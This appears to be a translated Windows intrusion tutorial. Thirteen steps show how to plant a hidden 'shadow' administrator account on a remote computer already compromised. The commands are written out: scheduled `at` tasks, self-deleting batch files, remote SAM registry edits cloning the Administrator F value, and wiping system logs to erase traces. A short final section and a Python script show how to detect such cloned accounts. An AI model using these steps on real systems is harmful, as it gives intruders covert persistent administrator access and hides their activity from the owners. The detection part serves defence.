Steps:
1. There are many ways to obtain the highest permissions (administrator privilege) on the remote computer; the difficulty depends on the level of defense of the target computer. How to obtain these permissions is not described here.
2. Use various tools to enable the Remote Registry, Task Scheduler and Server services on the remote computer.
3. Compile the "add administrator account" DOS command program, that is, a .com or .bat program. The program should close its own running window and clear itself afterwards to remove traces. Upload these files to the other party's computer (hidden in an obscure location).
4. To run these DOS commands on the remote computer, create a scheduled task on it (it runs at system level). In the local DOS environment, enter the following command: at \\xx.xx.xx.xx time \\xx.xx.xx.xx\path\dosprogram
5. Run the following command to test whether the remote account was added successfully: net use \\xx.xx.xx.xx\IPC$ "password" /user:"account name". If the remote connection succeeds, the account has been added.
6. Log out of the connection made with the added account: net use \\xx.xx.xx.xx\IPC$ /del
7. Run regedt32.exe on the local computer, connect to the remote computer xx.xx.xx.xx, and set the permission of the remote computer's administrator on the SAM registry key to Full Control. Exit regedt32. Open regedit.exe and connect to the remote computer's registry. Copy the F value of an existing administrator account into the F value of the newly added administrator account.
8. Export the registry key of the new administrator account from the remote computer. The following command can be used: at \\xx.xx.xx.xx time \\xx.xx.xx.xx\ADMIN$\regedit.exe /e name.reg <registry path to export>
9. Create a DOS command program that deletes the newly added administrator account and run it on the remote computer as a scheduled task. Test to ensure that the account has been deleted.
10. Import the exported registry file on the remote computer: at \\xx.xx.xx.xx time \\xx.xx.xx.xx\ADMIN$\regedit.exe /s name.reg (/s: silent import)
11. Change the SAM permission in the remote registry back so that only the system-level account retains modify permission, i.e. restore the original permission.
12. Use the MT program to delete the system records on the remote computer and erase all traces that reveal your activity. Remember to clean up your work.
13. Connect to the remote computer and log on with the created shadow account. If the test succeeds, you can check that the account is not displayed among the accounts on the remote computer.
A shadow account is equivalent to an administrator account with the same password as Administrator. When the Administrator password changes, the shadow account's password stays the same, but when the shadow account's password changes, the Administrator password changes with it. The shadow account cannot be seen with conventional methods; it can only be found in the registry.
Follow these steps to create a shadow account:
Locate "HKEY_LOCAL_MACHINE\SAM\Domains\ACCOUNT\User\names\Administrator" (and remember it).
Save and double-click to import the registry file.
XXX is any name.
How to find the shadow account:
1. Open the registry, find "HKEY_LOCAL_MACHINE\SAM\Domains\ACCOUNT\User\names\Administrator" and view its default value.
2. Any key under "HKEY_LOCAL_MACHINE\SAM\Domains\ACCOUNT\User\names" with the same value as above is a shadow account.
(Sometimes the shadow account may not be a clone of Administrator but of a normal account.)
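The check above (two names under the SAM Names key sharing one default value) can be automated when auditing a machine. The following is an added example, not code from the original page: it parses a regedit /e export of the Names key, where each name's default value carries the account RID as the value type (hex(1f4) is RID 500, the built-in Administrator), and reports any RID claimed by more than one name. The export text is constructed for illustration, and the key path is written as regedit exports it rather than as abbreviated above.

```python
import re
from collections import defaultdict

# Constructed sample of a "regedit /e" export of the SAM Names key (not from the page).
# In such an export the default value of each account subkey has no data; the RID is
# encoded in the value *type*, e.g. hex(1f4) = 500 for the built-in Administrator.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator]
@=hex(1f4):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest]
@=hex(1f5):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\alice]
@=hex(3e9):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\svc$]
@=hex(1f4):
"""

# Subkey header for one account name, and its default value with the RID in the type.
KEY_RE = re.compile(r"^\[.+\\Names\\(?P<name>[^\\\]]+)\]$", re.IGNORECASE)
DEFAULT_RE = re.compile(r"^@=hex\((?P<rid>[0-9a-fA-F]+)\):")

def parse_names(reg_text):
    """Return {account name: RID} from a .reg export of the Names key."""
    rids = {}
    current = None
    for line in reg_text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group("name")
            continue
        m = DEFAULT_RE.match(line)
        if m and current is not None:
            rids[current] = int(m.group("rid"), 16)
    return rids

def find_shadow_accounts(rids):
    """RIDs claimed by more than one name; every extra name is a cloned (shadow) account."""
    by_rid = defaultdict(list)
    for name, rid in rids.items():
        by_rid[rid].append(name)
    return {rid: sorted(names) for rid, names in by_rid.items() if len(names) > 1}

if __name__ == "__main__":
    print(find_shadow_accounts(parse_names(SAMPLE_REG)))
```

Reading the live SAM hive requires SYSTEM rights, so in practice the export is taken with a SYSTEM-level session or from an offline hive copy.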